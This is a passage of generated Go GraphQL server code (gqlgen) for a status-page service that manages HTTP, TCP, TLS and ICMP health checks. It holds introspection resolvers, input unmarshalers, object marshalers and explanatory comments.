return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Fields(args["includeDeprecated"].(bool)), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.Field)
fc.Result = res
return ec.marshalO__Field2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐFieldᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_interfaces(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.Interfaces(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_possibleTypes(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.PossibleTypes(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐTypeᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_enumValues(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
rawArgs := field.ArgumentMap(ec.Variables)
args, err := ec.field___Type_enumValues_args(ctx, rawArgs)
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
fc.Args = args
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.EnumValues(args["includeDeprecated"].(bool)), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.EnumValue)
fc.Result = res
return ec.marshalO__EnumValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐEnumValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_inputFields(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.InputFields(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.([]introspection.InputValue)
fc.Result = res
return ec.marshalO__InputValue2ᚕgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐInputValueᚄ(ctx, field.Selections, res)
}
func (ec *executionContext) ___Type_ofType(ctx context.Context, field graphql.CollectedField, obj *introspection.Type) (ret graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
ret = graphql.Null
}
}()
fc := &graphql.FieldContext{
Object: "__Type",
Field: field,
Args: nil,
IsMethod: true,
IsResolver: false,
}
ctx = graphql.WithFieldContext(ctx, fc)
resTmp, err := ec.ResolverMiddleware(ctx, func(rctx context.Context) (interface{}, error) {
ctx = rctx // use context from middleware stack in children
return obj.OfType(), nil
})
if err != nil {
ec.Error(ctx, err)
return graphql.Null
}
if resTmp == nil {
return graphql.Null
}
res := resTmp.(*introspection.Type)
fc.Result = res
return ec.marshalO__Type2ᚖgithubᚗcomᚋ99designsᚋgqlgenᚋgraphqlᚋintrospectionᚐType(ctx, field.Selections, res)
}
// endregion **************************** field.gotpl *****************************
// region **************************** input.gotpl *****************************
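// Input unmarshalers convert the raw map produced by the GraphQL parser into
// the generated input structs. Each one iterates the supplied map, pushes a
// path segment onto the context for error reporting, and delegates each field
// to the matching scalar unmarshaler; the first failure aborts with a
// partially populated struct. For example, a variables payload such as
//
//	{"id": "check-1", "frecuency": "30s", "url": "https://example.com"}
//
// (a hypothetical input, shown only for illustration; "frecuency" mirrors the
// schema's spelling) would populate models.CreateHTTPCheckInput below.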
func (ec *executionContext) unmarshalInputCreateHttpCheckInput(ctx context.Context, obj interface{}) (models.CreateHTTPCheckInput, error) {
var it models.CreateHTTPCheckInput
	asMap := obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "url":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("url"))
it.URL, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
func (ec *executionContext) unmarshalInputCreateIcmpCheckInput(ctx context.Context, obj interface{}) (models.CreateIcmpCheckInput, error) {
var it models.CreateIcmpCheckInput
	asMap := obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "address":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("address"))
it.Address, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
func (ec *executionContext) unmarshalInputCreateTcpCheckInput(ctx context.Context, obj interface{}) (models.CreateTCPCheckInput, error) {
var it models.CreateTCPCheckInput
	asMap := obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "address":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("address"))
it.Address, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
func (ec *executionContext) unmarshalInputCreateTlsCheckInput(ctx context.Context, obj interface{}) (models.CreateTLSCheckInput, error) {
var it models.CreateTLSCheckInput
	asMap := obj.(map[string]interface{})
for k, v := range asMap {
switch k {
case "id":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("id"))
it.ID, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "frecuency":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("frecuency"))
it.Frecuency, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "address":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("address"))
it.Address, err = ec.unmarshalNString2string(ctx, v)
if err != nil {
return it, err
}
case "rootCAs":
var err error
ctx := graphql.WithPathContext(ctx, graphql.NewPathWithField("rootCAs"))
it.RootCAs, err = ec.unmarshalOString2ᚖstring(ctx, v)
if err != nil {
return it, err
}
}
}
return it, nil
}
// endregion **************************** input.gotpl *****************************
// region ************************** interface.gotpl ***************************
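// _Check dispatches a value implementing the Check GraphQL interface to the
// marshaler for its concrete type. Both value and pointer forms are handled;
// nil pointers marshal to graphql.Null, and an unknown concrete type is a
// programming error, hence the panic.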
func (ec *executionContext) _Check(ctx context.Context, sel ast.SelectionSet, obj models.Check) graphql.Marshaler {
	switch obj := obj.(type) {
case nil:
return graphql.Null
case models.HTTPCheck:
return ec._HttpCheck(ctx, sel, &obj)
case *models.HTTPCheck:
if obj == nil {
return graphql.Null
}
return ec._HttpCheck(ctx, sel, obj)
case models.TCPCheck:
return ec._TcpCheck(ctx, sel, &obj)
case *models.TCPCheck:
if obj == nil {
return graphql.Null
}
return ec._TcpCheck(ctx, sel, obj)
case models.TLSCheck:
return ec._TlsCheck(ctx, sel, &obj)
case *models.TLSCheck:
if obj == nil {
return graphql.Null
}
return ec._TlsCheck(ctx, sel, obj)
case models.IcmpCheck:
return ec._IcmpCheck(ctx, sel, &obj)
case *models.IcmpCheck:
if obj == nil {
return graphql.Null
}
return ec._IcmpCheck(ctx, sel, obj)
default:
panic(fmt.Errorf("unexpected type %T", obj))
}
}
// endregion ************************** interface.gotpl ***************************
// region **************************** object.gotpl ****************************
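// Object marshalers resolve a selection set against a concrete object. They
// collect the requested fields, marshal each into a FieldSet, and count
// "invalids": non-null fields that resolved to graphql.Null. If any such
// violation occurred the whole object marshals to graphql.Null, letting
// null-ness bubble up to the nearest nullable ancestor as the spec requires.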
var checkExecutionImplementors = []string{"CheckExecution"}
func (ec *executionContext) _CheckExecution(ctx context.Context, sel ast.SelectionSet, obj *models.CheckExecution) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, checkExecutionImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("CheckExecution")
case "id":
out.Values[i] = ec._CheckExecution_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "executionTime":
out.Values[i] = ec._CheckExecution_executionTime(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "message":
out.Values[i] = ec._CheckExecution_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._CheckExecution_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._CheckExecution_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var deleteResponseImplementors = []string{"DeleteResponse"}
func (ec *executionContext) _DeleteResponse(ctx context.Context, sel ast.SelectionSet, obj *models.DeleteResponse) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, deleteResponseImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("DeleteResponse")
case "id":
out.Values[i] = ec._DeleteResponse_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var httpCheckImplementors = []string{"HttpCheck", "Check"}
func (ec *executionContext) _HttpCheck(ctx context.Context, sel ast.SelectionSet, obj *models.HTTPCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, httpCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("HttpCheck")
case "id":
out.Values[i] = ec._HttpCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._HttpCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._HttpCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "url":
out.Values[i] = ec._HttpCheck_url(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._HttpCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._HttpCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._HttpCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._HttpCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var icmpCheckImplementors = []string{"IcmpCheck", "Check"}
func (ec *executionContext) _IcmpCheck(ctx context.Context, sel ast.SelectionSet, obj *models.IcmpCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, icmpCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("IcmpCheck")
case "id":
out.Values[i] = ec._IcmpCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._IcmpCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._IcmpCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "address":
out.Values[i] = ec._IcmpCheck_address(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._IcmpCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._IcmpCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._IcmpCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._IcmpCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
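// Mutation fields are resolved strictly in the order they appear in the
// selection set, unlike the Query fields below, which may run concurrently;
// serial execution of root mutation fields is mandated by the GraphQL spec.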
var mutationImplementors = []string{"Mutation"}
func (ec *executionContext) _Mutation(ctx context.Context, sel ast.SelectionSet) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, mutationImplementors)
ctx = graphql.WithFieldContext(ctx, &graphql.FieldContext{
Object: "Mutation",
})
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("Mutation")
case "poll":
out.Values[i] = ec._Mutation_poll(ctx, field)
case "createHttpCheck":
out.Values[i] = ec._Mutation_createHttpCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "createTcpCheck":
out.Values[i] = ec._Mutation_createTcpCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "createTlsCheck":
out.Values[i] = ec._Mutation_createTlsCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "createIcmpCheck":
out.Values[i] = ec._Mutation_createIcmpCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
case "deleteCheck":
out.Values[i] = ec._Mutation_deleteCheck(ctx, field)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var pollResultImplementors = []string{"PollResult"}
func (ec *executionContext) _PollResult(ctx context.Context, sel ast.SelectionSet, obj *models.PollResult) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, pollResultImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("PollResult")
case "took":
out.Values[i] = ec._PollResult_took(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
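// Root Query fields backed by resolvers ("checks" and "executions") are
// dispatched concurrently via out.Concurrently, each goroutine recovering
// its own panics so one failing resolver cannot take down the request.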
var queryImplementors = []string{"Query"}
func (ec *executionContext) _Query(ctx context.Context, sel ast.SelectionSet) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, queryImplementors)
ctx = graphql.WithFieldContext(ctx, &graphql.FieldContext{
Object: "Query",
})
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("Query")
case "checks":
field := field
out.Concurrently(i, func() (res graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
}
}()
res = ec._Query_checks(ctx, field)
return res
})
case "executions":
field := field
out.Concurrently(i, func() (res graphql.Marshaler) {
defer func() {
if r := recover(); r != nil {
ec.Error(ctx, ec.Recover(ctx, r))
}
}()
res = ec._Query_executions(ctx, field)
return res
})
case "__type":
out.Values[i] = ec._Query___type(ctx, field)
case "__schema":
out.Values[i] = ec._Query___schema(ctx, field)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var tcpCheckImplementors = []string{"TcpCheck", "Check"}
func (ec *executionContext) _TcpCheck(ctx context.Context, sel ast.SelectionSet, obj *models.TCPCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, tcpCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("TcpCheck")
case "id":
out.Values[i] = ec._TcpCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._TcpCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._TcpCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "address":
out.Values[i] = ec._TcpCheck_address(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._TcpCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._TcpCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._TcpCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._TcpCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var tlsCheckImplementors = []string{"TlsCheck", "Check"}
func (ec *executionContext) _TlsCheck(ctx context.Context, sel ast.SelectionSet, obj *models.TLSCheck) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, tlsCheckImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("TlsCheck")
case "id":
out.Values[i] = ec._TlsCheck_id(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "identifier":
out.Values[i] = ec._TlsCheck_identifier(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "frecuency":
out.Values[i] = ec._TlsCheck_frecuency(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "address":
out.Values[i] = ec._TlsCheck_address(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "status":
out.Values[i] = ec._TlsCheck_status(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "latestCheck":
out.Values[i] = ec._TlsCheck_latestCheck(ctx, field, obj)
case "message":
out.Values[i] = ec._TlsCheck_message(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "errorMsg":
out.Values[i] = ec._TlsCheck_errorMsg(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
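// The ___-prefixed marshalers below serve the standard GraphQL introspection
// types (__Directive, __EnumValue, __Field, __InputValue, __Schema, __Type),
// following the same field-collection pattern as the domain objects above.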
var __DirectiveImplementors = []string{"__Directive"}
func (ec *executionContext) ___Directive(ctx context.Context, sel ast.SelectionSet, obj *introspection.Directive) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __DirectiveImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Directive")
case "name":
out.Values[i] = ec.___Directive_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___Directive_description(ctx, field, obj)
case "locations":
out.Values[i] = ec.___Directive_locations(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "args":
out.Values[i] = ec.___Directive_args(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __EnumValueImplementors = []string{"__EnumValue"}
func (ec *executionContext) ___EnumValue(ctx context.Context, sel ast.SelectionSet, obj *introspection.EnumValue) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __EnumValueImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__EnumValue")
case "name":
out.Values[i] = ec.___EnumValue_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___EnumValue_description(ctx, field, obj)
case "isDeprecated":
out.Values[i] = ec.___EnumValue_isDeprecated(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "deprecationReason":
out.Values[i] = ec.___EnumValue_deprecationReason(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __FieldImplementors = []string{"__Field"}
func (ec *executionContext) ___Field(ctx context.Context, sel ast.SelectionSet, obj *introspection.Field) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __FieldImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Field")
case "name":
out.Values[i] = ec.___Field_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___Field_description(ctx, field, obj)
case "args":
out.Values[i] = ec.___Field_args(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "type":
out.Values[i] = ec.___Field_type(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "isDeprecated":
out.Values[i] = ec.___Field_isDeprecated(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "deprecationReason":
out.Values[i] = ec.___Field_deprecationReason(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __InputValueImplementors = []string{"__InputValue"}
func (ec *executionContext) ___InputValue(ctx context.Context, sel ast.SelectionSet, obj *introspection.InputValue) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __InputValueImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__InputValue")
case "name":
out.Values[i] = ec.___InputValue_name(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "description":
out.Values[i] = ec.___InputValue_description(ctx, field, obj)
case "type":
out.Values[i] = ec.___InputValue_type(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "defaultValue":
out.Values[i] = ec.___InputValue_defaultValue(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __SchemaImplementors = []string{"__Schema"}
func (ec *executionContext) ___Schema(ctx context.Context, sel ast.SelectionSet, obj *introspection.Schema) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __SchemaImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Schema")
case "types":
out.Values[i] = ec.___Schema_types(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "queryType":
out.Values[i] = ec.___Schema_queryType(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "mutationType":
out.Values[i] = ec.___Schema_mutationType(ctx, field, obj)
case "subscriptionType":
out.Values[i] = ec.___Schema_subscriptionType(ctx, field, obj)
case "directives":
out.Values[i] = ec.___Schema_directives(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
var __TypeImplementors = []string{"__Type"}
func (ec *executionContext) ___Type(ctx context.Context, sel ast.SelectionSet, obj *introspection.Type) graphql.Marshaler {
fields := graphql.CollectFields(ec.OperationContext, sel, __TypeImplementors)
out := graphql.NewFieldSet(fields)
var invalids uint32
for i, field := range fields {
switch field.Name {
case "__typename":
out.Values[i] = graphql.MarshalString("__Type")
case "kind":
out.Values[i] = ec.___Type_kind(ctx, field, obj)
if out.Values[i] == graphql.Null {
invalids++
}
case "name":
out.Values[i] = ec.___Type_name(ctx, field, obj)
case "description":
out.Values[i] = ec.___Type_description(ctx, field, obj)
case "fields":
out.Values[i] = ec.___Type_fields(ctx, field, obj)
case "interfaces":
out.Values[i] = ec.___Type_interfaces(ctx, field, obj)
case "possibleTypes":
out.Values[i] = ec.___Type_possibleTypes(ctx, field, obj)
case "enumValues":
out.Values[i] = ec.___Type_enumValues(ctx, field, obj)
case "inputFields":
out.Values[i] = ec.___Type_inputFields(ctx, field, obj)
case "ofType":
out.Values[i] = ec.___Type_ofType(ctx, field, obj)
default:
panic("unknown field " + strconv.Quote(field.Name))
}
}
out.Dispatch()
if invalids > 0 {
return graphql.Null
}
return out
}
// endregion **************************** object.gotpl ****************************
// region ***************************** type.gotpl *****************************
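// Scalar and wrapper converters. The name encoding is gqlgen's: an N prefix
// marks a non-null position and an O prefix an optional one, while the runic
// characters stand in for symbols Go identifiers cannot contain (ᚕ for a
// slice, ᚖ for a pointer, ᚗ and ᚋ for "." and "/" in import paths, and a
// trailing ᚄ for a list whose elements are non-null). marshalN* helpers
// report a "must not be null" error when handed a null value; marshalO*
// helpers simply return graphql.Null.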
func (ec *executionContext) unmarshalNBoolean2bool(ctx context.Context, v interface{}) (bool, error) {
res, err := graphql.UnmarshalBoolean(v)
return res, graphql.ErrorOnPath(ctx, err)
}
func (ec *executionContext) marshalNBoolean2bool(ctx context.Context, sel ast.SelectionSet, v bool) graphql.Marshaler {
res := graphql.MarshalBoolean(v)
if res == graphql.Null {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
}
return res
}
func (ec *executionContext) marshalNCheck2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheck(ctx context.Context, sel ast.SelectionSet, v models.Check) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec._Check(ctx, sel, v)
}
func (ec *executionContext) marshalNCheckExecution2ᚖgithubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCheckExecution(ctx context.Context, sel ast.SelectionSet, v *models.CheckExecution) graphql.Marshaler {
if v == nil {
if !graphql.HasFieldError(ctx, graphql.GetFieldContext(ctx)) {
ec.Errorf(ctx, "must not be null")
}
return graphql.Null
}
return ec._CheckExecution(ctx, sel, v)
}
func (ec *executionContext) unmarshalNCreateHttpCheckInput2githubᚗcomᚋkfsoftwareᚋstatuspageᚋpkgᚋgraphqlᚋmodelsᚐCreateHTTPCheckInput(ctx context.Context, v interface{}) (models.CreateHTTPCheckInput, error) {
res, err := ec.unmarshalInputCreateHttpCheckInput(ctx, v)
return res, graphql.ErrorOnPath(ctx, err)
}
